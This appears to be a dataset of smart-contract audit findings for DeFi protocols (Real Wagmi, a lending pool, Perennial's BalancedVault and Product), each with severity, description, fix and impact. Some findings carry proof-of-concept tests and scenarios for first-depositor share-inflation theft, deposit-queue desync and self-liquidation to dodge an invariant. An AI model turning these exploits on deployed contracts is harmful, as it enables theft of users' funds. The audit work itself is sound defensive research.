hardcoded pool feesчhighчWrong calculation of `tickCumulatives` due to hardcoded pool fees\\nReal Wagmi is using a hardcoded `500` fee to calculate the `amountOut` to check for slippage and revert if it was to high, or got less funds back than expected.\\n```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n\\nThere are several problems with the hardcoding of the `500` as the fee.\\nNot all tokens have `500` fee pools\\nThe swapping takes place in pools that don't have a `500` fee\\nThe `500` pool fee is not the optimal to fetch the `tickCumulatives` due to low volume\\nSpecially as they are deploying in so many secondary chains like Kava, this will be a big problem pretty much in every transaction over there.\\nIf any of those scenarios is given, `tickCumulatives` will be incorrectly calculated and it will set an incorrect slippage return.чConsider allowing the fees as an input and consider not even picking low TVL pools with no transationsчIncorrect slippage calculation will increase the risk of `rebalanceAll()` rebalance getting rekt.ч```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n -No slippage protection when withdrawing and providing liquidity in rebalanceAllчhighчWhen `rebalanceAll` is called, the liquidity is first withdrawn from the pools and then deposited to new positions. However, there is no slippage protection for these operations.\\nIn the `rebalanceAll` function, it first withdraws all liquidity from the pools and deposits all liquidity to new positions.\\n```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n\\n```\\n _deposit(reserve0, reserve1, _totalSupply, slots);\\n```\\n\\nHowever, there are no parameters for `amount0Min` and `amount1Min`, which are used to prevent slippage. These parameters should be checked to create slippage protections.\\nActually, they are implemented in the `deposit` and `withdraw` functions, but just not in the rebalanceAll function.чImplement slippage protection in rebalanceAll as suggested to avoid loss to the protocol.чThe withdraw and provide liquidity operations in rebalanceAll are exposed to high slippage and could result in a loss for LPs of multipool.ч```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n -Usage of `slot0` is extremely easy to manipulateчhighчUsage of `slot0` is extremely easy to manipulate\\nReal Wagmi is using `slot0` to calculate several variables in their codebase:\\nslot0 is the most recent data point and is therefore extremely easy to manipulate.\\nMultipool directly uses the token values returned by `getAmountsForLiquidity`\\n```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n\\nto calculate the reserves.\\n```\\n reserve0 += amount0;\\n reserve1 += amount1;\\n```\\nчTo make any calculation use a TWAP instead of slot0.чPool lp value can be manipulated and cause other users to receive less lp tokens.ч```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n -The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contractчhighчThe `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract\\nIn Dispatcher contract, `_estimateWithdrawalLp` function returns the value of shares amount based on the average of ratios `amount0 / reserve0` and `amount1 / reserve1`.\\n```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n\\nFrom `Dispatcher.withdraw` and `Dispatcher.deposit` function, amount0 and amount1 will be the accumulated fees of users\\n```\\nuint256 lpAmount;\\n{\\n (uint256 fee0, uint256 fee1) = _calcFees(feesGrow, user);\\n lpAmount = _estimateWithdrawalLp(reserve0, reserve1, _totalSupply, fee0, fee1);\\n}\\nuser.shares -= lpAmount;\\n_withdrawFee(pool, lpAmount, reserve0, reserve1, _totalSupply, deviationBP);\\n```\\n\\nHowever, it is important to note that the values of reserve0 and reserve1 can fluctuate significantly. This is because the positions of the Multipool in UniSwapV3 pools (concentrated) are unstable on-chain, and they can change substantially as the state of the pools changes. As a result, the `_estimateWithdrawalLp` function might return a large value even for a small fee amount. This could potentially lead to reverting due to underflow in the deposit function (in cases where lpAmount > user.shares), or it could result in withdrawing a larger amount of Multipool LP than initially expected.\\nScenario:\\nTotal supply of Multipool is 1e18, and Alice has 1e16 (1%) LP amounts which deposited into Dispatcher contract.\\nAlice accrued fees = 200 USDC and 100 USDT\\nThe reserves of Multipool are 100,000 USDC and 100,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(0.2% + 0.1%) / 2 * totalSupply` = `0.15% * totalSupply` = 1.5e15 LP amounts\\nHowever, in some cases, UniSwapV3 pools may experience fluctuations, reserves of Multipool are 10,000 USDC and 190,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(2% + 0.052%) / 2 * totalSupply` = `1.026% * totalSupply` = 1.026e16 LP amounts This result is greater than LP amounts of Alice (1e16), leading to reverting by underflow in deposit/withdraw function of Dispatcher contract.чShouldn't use the average ratio for calculation in_estimateWithdrawalLp functionчUsers may face 2 potential issues when interacting with the Dispatcher contract.\\nThey might be unable to deposit/withdraw\\nSecondly, users could potentially lose significant incentives when depositing or withdrawing due to unexpected withdrawals of LP amounts for their fees.ч```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n -The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)чmediumчThe deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)\\nthe protocol missing the DEADLINE check at all in logic.\\nthis is actually how uniswap implemented the Deadline, this protocol also need deadline check like this logic\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.чconsider adding deadline check like in the functions like withdraw and deposit and all operations the point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\nчThe transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -Lenders lose interests and pay deposit fees due to no slippage controlчmediumчWhen a lender deposits quote tokens below the minimum of LUP(Lowest Utilization Price) and HTP(Highest Threshold Price), the deposits will not earn interest and will also be charged deposit fees, according to docs. When a lender deposits to a bucket, they are vulnerable to pool LUP slippage which might cause them to lose funds due to fee charges against their will.\\nA lender would call `addQuoteToken()` to deposit. This function only allows entering expiration time for transaction settlement, but there is no slippage protection.\\n```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n\\nIn LenderActions.sol, `addQuoteToken()` takes current `DepositsState` in storage and current `poolState_.debt` in storage to calculate spot LUP prior to deposit. And this LUP is compared with user input bucket `index_` to determine if the lender will be punished with deposit fees. The deposit amount is then written to storage.\\n```\\n//LenderActions.sol\\n function addQuoteToken(\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n PoolState calldata poolState_,\\n AddQuoteParams calldata params_\\n ) external returns (uint256 bucketLP_, uint256 lup_) {\\n // rest of code\\n // charge unutilized deposit fee where appropriate\\n |> uint256 lupIndex = Deposits.findIndexOfSum(deposits_, poolState_.debt);\\n bool depositBelowLup = lupIndex != 0 && params_.index > lupIndex;\\n if (depositBelowLup) {\\n addedAmount = Maths.wmul(addedAmount, Maths.WAD - _depositFeeRate(poolState_.rate));\\n }\\n// rest of code\\n Deposits.unscaledAdd(deposits_, params_.index, unscaledAmount);\\n// rest of code\\n```\\n\\nIt should be noted that current `deposits_` and `poolState_.debt` can be different from when the user invoked the transaction, which will result in a different LUP spot price unforeseen by the lender to determine deposit fees. Even though lenders can input a reasonable expiration time `expirty_`, this will only prevent stale transactions to be executed and not offer any slippage control.\\nWhen there are many lenders depositing around the same time, LUP spot price can be increased and if the user transaction settles after a whale lender which moves the LUP spot price up significantly, the user might get accidentally punished for depositing below LUP. Or there could also be malicious lenders trying to ensure their transactions settle at a favorable LUP/HTP and front-run the user transaction, in which case the user transaction might still settle after the malicious lender and potentially get charged for fees.чAdd slippage protection in Pool.sol `addQuoteToken()`. A lender can enable slippage protection, which will enable comparing deposit `index_` with `lupIndex` in LenderActions.sol.чLenders might get charged deposit fees due to slippage against their will with or without MEV attacks, lenders might also lose on interest by depositing below HTP.ч```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n -BalancedVault.sol: loss of funds + global settlement flywheel / user settlement flywheels getting out of syncчhighчWhen an epoch has become \"stale\", the `BalancedVault` will treat any new deposits and redemptions in this epoch as \"pending\". This means they won't get processed by the global settlement flywheel in the next epoch but one epoch later than that.\\nDue to the fact that anyone can push a pending deposit or redemption of a user further ahead by making an arbitrarily small deposit in the \"intermediate epoch\" (i.e. the epoch between when the user creates the pending deposit / redemption and the epoch when it is scheduled to be processed by the global settlement flywheel), the user can experience a DOS.\\nWorse than that, by pushing the pending deposit / pending redemption further ahead, the global settlement flywheel and the user settlement flywheel get out of sync.\\nAlso users can experience a loss of funds.\\nSo far so good. The global settlement flywheel and the user settlement flywheel are in sync and will process the pending deposit in epoch `3`.\\nNow here's the issue. A malicious user2 or user1 unknowingly (depending on the specific scenario) calls `deposit` for user1 again in the current epoch `2` once it has become `stale` (it's possible to `deposit` an arbitrarily small amount). By doing so we set `_pendingEpochs[user1] = context.epoch + 1 = 3`, thereby pushing the processing of the `deposit` in the user settlement flywheel one epoch ahead.\\nIt's important to understand that the initial deposit will still be processed in epoch `3` in the global settlement flywheel, it's just being pushed ahead in the user settlement flywheel.\\nThereby the global settlement flywheel and user settlement flywheel are out of sync now.\\nAn example for a loss of funds that can occur as a result of this issue is when the PnL from epoch `3` to epoch `4` is positive. Thereby the user1 will get less shares than he is entitled to.\\nSimilarly it is possible to push pending redemptions ahead, thereby the `_totalUnclaimed` amount would be increased by an amount that is different from the amount that `_unclaimed[account]` is increased by.\\nComing back to the case with the pending deposit, I wrote a test that you can add to BalancedVaultMulti.test.ts:\\n```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n\\nThe impact that is generated by having one pending deposit that is off by one epoch is small. However over time this would evolve into a chaotic situation, where the state of the Vault is significantly corrupted.чMy recommendation is to implement a queue for pending deposits / pending redemptions of a user. Pending deposits / redemptions can then be processed independently (without new pending deposits / redemptions affecting when existing ones are processed).\\nPossibly there is a simpler solution which might involve restricting the ability to make deposits to the user himself and only allowing one pending deposit / redemption to exist at a time.\\nThe solution to implement depends on how flexible the sponsor wants the deposit / redemption functionality to be.чThe biggest impact comes from the global settlement flywheel and user settlement flywheel getting out of sync. As shown above, this can lead to a direct loss of funds for the user (e.g. the amount of shares he gets for a deposit are calculated with the wrong context).\\nApart from the direct impact for a single user, there is a subtler impact which can be more severe in the long term. Important invariants are violated:\\nSum of user balances is equal to the total supply\\nSum of unclaimed user assets is equal to total unclaimed assets\\nThereby the impact is not limited to a single user but affects the calculations for all users.\\nLess important but still noteworthy is that users that deposit into the Vault are partially exposed to PnL in the underlying products. The Vault does not employ a fully delta-neutral strategy. Therefore by experiencing a larger delay until the pending deposit / redemption is processed, users incur the risk of negative PnL.ч```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n -ChainlinkAggregator: binary search for roundId does not work correctly and Oracle can even end up temporarily DOSedчmediumчWhen a phase switchover occurs, it can be necessary that phases need to be searched for a `roundId` with a timestamp as close as possible but bigger than `targetTimestamp`.\\nFinding the `roundId` with the closest possible timestamp is necessary according to the sponsor to minimize the delay of position changes:\\n\\nThe binary search algorithm is not able to find this best `roundId` which thereby causes unintended position changes.\\nAlso it can occur that the `ChainlinkAggregator` library is unable to find a valid `roundId` at all (as opposed to only not finding the \"best\").\\nThis would cause the Oracle to be temporarily DOSed until there are more valid rounds.\\nLet's say in a phase there's only one valid round (roundId=1) and the timestamp for this round is greater than `targetTimestamp`\\nWe would expect the `roundId` that the binary search finds to be `roundId=1`.\\nThe binary search loop is executed with `minRoundId=1` and `maxRoundId=1001`.\\nAll the above conditions can easily occur in reality, they represent the basic scenario under which this algorithm executes.\\n`minRoundId` and `maxRoundId` change like this in the iterations of the loop:\\n```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n\\nSince we assumed that `roundId=2` is invalid, the function returns `0` (maxTimestamp=type(uint256).max):\\nIn the case that `latestRound.roundId` is equal to the `roundId=1` (i.e. same phase and same round id which could not be found) there would be no other valid rounds that the `ChainlinkAggregator` can find which causes a temporary DOS.чI recommend to add a check if `minRoundId` is a valid solution for the binary search. If it is, `minRoundId` should be used to return the result instead of maxRoundId:\\n```\\n // If the found timestamp is not greater than target timestamp or no max was found, then the desired round does\\n // not exist in this phase\\n// Remove the line below\\n if (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max) return 0;\\n// Add the line below\\n if ((minTimestamp <= targetTimestamp || minTimestamp == type(uint256).max) && (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max)) return 0;\\n \\n// Add the line below\\n if (minTimestamp > targetTimestamp) {\\n// Add the line below\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(minRoundId));\\n// Add the line below\\n }\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(maxRoundId));\\n }\\n```\\n\\nAfter applying the changes, the binary search only returns `0` if both `minRoundId` and `maxRoundId` are not a valid result.\\nIf this line is passed we know that either of both is valid and we can use `minRoundId` if it is the better result.чAs explained above this would result in sub-optimal and unintended position changes in the best case. In the worst-case the Oracle can be temporarily DOSed, unable to find a valid `roundId`.\\nThis means that users cannot interact with the perennial protocol because the Oracle cannot be synced. So they cannot close losing trades which is a loss of funds.ч```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n -BalancedVault.sol: Early depositor can manipulate exchange rate and steal fundsчmediumчThe first depositor can mint a very small number of shares, then donate assets to the Vault. Thereby he manipulates the exchange rate and later depositors lose funds due to rounding down in the number of shares they receive.\\nThe currently deployed Vaults already hold funds and will merely be upgraded to V2. However as Perennial expands there will surely be the need for more Vaults which enables this issue to occur.\\nYou can add the following test to `BalancedVaultMulti.test.ts`. Make sure to have the `dsu` variable available in the test since by default this variable is not exposed to the tests.\\nThe test is self-explanatory and contains the necessary comments:\\n```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\nчThis issue can be mitigated by requiring a minimum deposit of assets. Thereby the attacker cannot manipulate the exchange rate to be so low as to enable this attack.чThe attacker can steal funds from later depositors.ч```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n -User would liquidate his account to sidestep `takerInvariant` modifierчmediumчA single user could open a massive maker position, using the maximum leverage possible(and possibly reach the maker limit), and when a lot of takers open take positions, maker would liquidate his position, effectively bypassing the taker invariant and losing nothing apart from position fees. This would cause takers to be charged extremely high funding fees(at the maxRate), and takers that are not actively monitoring their positions will be greatly affected.\\nIn the closeMakeFor function, there is a modifier called `takerInvariant`.\\n```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n\\nThis modifier prevents makers from closing their positions if it would make the global maker open positions to fall below the global taker open positions. A malicious maker can easily sidestep this by liquidating his own account. Liquidating an account pays the liquidator a fee from the account's collateral, and then forcefully closes all open maker and taker positions for that account.\\n```\\nfunction closeAll(address account) external onlyCollateral notClosed settleForAccount(account) {\\n AccountPosition storage accountPosition = _positions[account];\\n Position memory p = accountPosition.position.next(_positions[account].pre);\\n\\n // Close all positions\\n _closeMake(account, p.maker);\\n _closeTake(account, p.taker);\\n\\n // Mark liquidation to lock position\\n accountPosition.liquidation = true; \\n }\\n```\\n\\nThis would make the open maker positions to drop significantly below the open taker position, and greatly increase the funding fee and utilization ratio.\\nATTACK SCENARIO\\nA new Product(ETH-Long) is launched on arbitrum with the following configurations:\\n20x max leverage(5% maintenance)\\nmakerFee = 0\\ntakerFee = 0.015\\nliquidationFee = 20%\\nminRate = 4%\\nmaxRate = 120%\\ntargetRate = 12%\\ntargetUtilization = 80%\\nmakerLimit = 4000 Eth\\nETH price = 1750 USD\\nColl Token = USDC\\nmax liquidity(USD) = 4000*1750 = $7,000,000\\nWhale initially supplies 350k USDC of collateral(~200ETH), and opens a maker position of 3000ETH($5.25mn), at 15x leverage.\\nAfter 2 weeks of activity, global open maker position goes up to 3429ETH($6mn), and because fundingFee is low, people are incentivized to open taker positions, so global open taker position gets to 2743ETH($4.8mn) at 80% utilization. Now, rate of fundingFee is 12%\\nNow, Whale should only be able to close up to 686ETH($1.2mn) of his maker position using the `closeMakeFor` function because of the `takerInvariant` modifier.\\nWhale decides to withdraw 87.5k USDC(~50ETH), bringing his total collateral to 262.5k USDC, and his leverage to 20x(which is the max leverage)\\nIf price of ETH temporarily goes up to 1755 USD, totalMaintenance=3000 * 1755 * 5% = $263250. Because his totalCollateral is 262500 USDC(which is less than totalMaintenance), his account becomes liquidatable.\\nWhale liquidates his account, he receives liquidationFee*totalMaintenance = 20% * 263250 = 52650USDC, and his maker position of 3000ETH gets closed. Now, he can withdraw his remaining collateral(262500-52650=209850)USDC because he has no open positions.\\nGlobal taker position is now 2743ETH($4.8mn), and global maker position is 429ETH($750k)\\nWhale has succeeded in bypassing the takerInvaraiant modifier, which was to prevent him from closing his maker position if it would make global maker position less than global taker position.\\nConsequently,\\nFunding fees would now be very high(120%), so the currently open taker positions will be greatly penalized, and takers who are not actively monitoring their position could lose a lot.\\nWhale would want to gain from the high funding fees, so he would open a maker position that would still keep the global maker position less than the global taker position(e.g. collateral of 232750USDC at 15x leverage, open position = ~2000ETH($3.5mn)) so that taker positions will keep getting charged at the funding fee maxRate.чConsider implementing any of these:\\nProtocol should receive a share of liquidation fee: This would disincentivize users from wanting to liquidate their own accounts, and they would want to keep their positions healthy and over-collateralized\\nLet there be a maker limit on each account: In addition to the global maker limit, there should be maker limit for each account which may be capped at 5% of global maker limit. This would decentralize liquidity provisioning.чIssue User would liquidate his account to sidestep `takerInvariant` modifier\\nUser will close his maker position when he shouldn't be allowed to, and it would cause open taker positions to be greatly impacted. And those who are not actively monitoring their open taker positions will suffer loss due to high funding fees.ч```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n -Accounts will not be liquidated when they are meant to.чmediumчIn the case that the totalMaintenance*liquidationFee is higher than the account's totalCollateral, liquidators are paid the totalCollateral. I think one of the reasons for this is to avoid the case where liquidating an account would attempt to debit fees that is greater than the collateral balance The problem is that, the value of totalCollateral used as fee is slightly higher value than the current collateral balance, which means that in such cases, attempts to liquidate the account would revert due to underflow errors.\\nHere is the `liquidate` function:\\n```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); 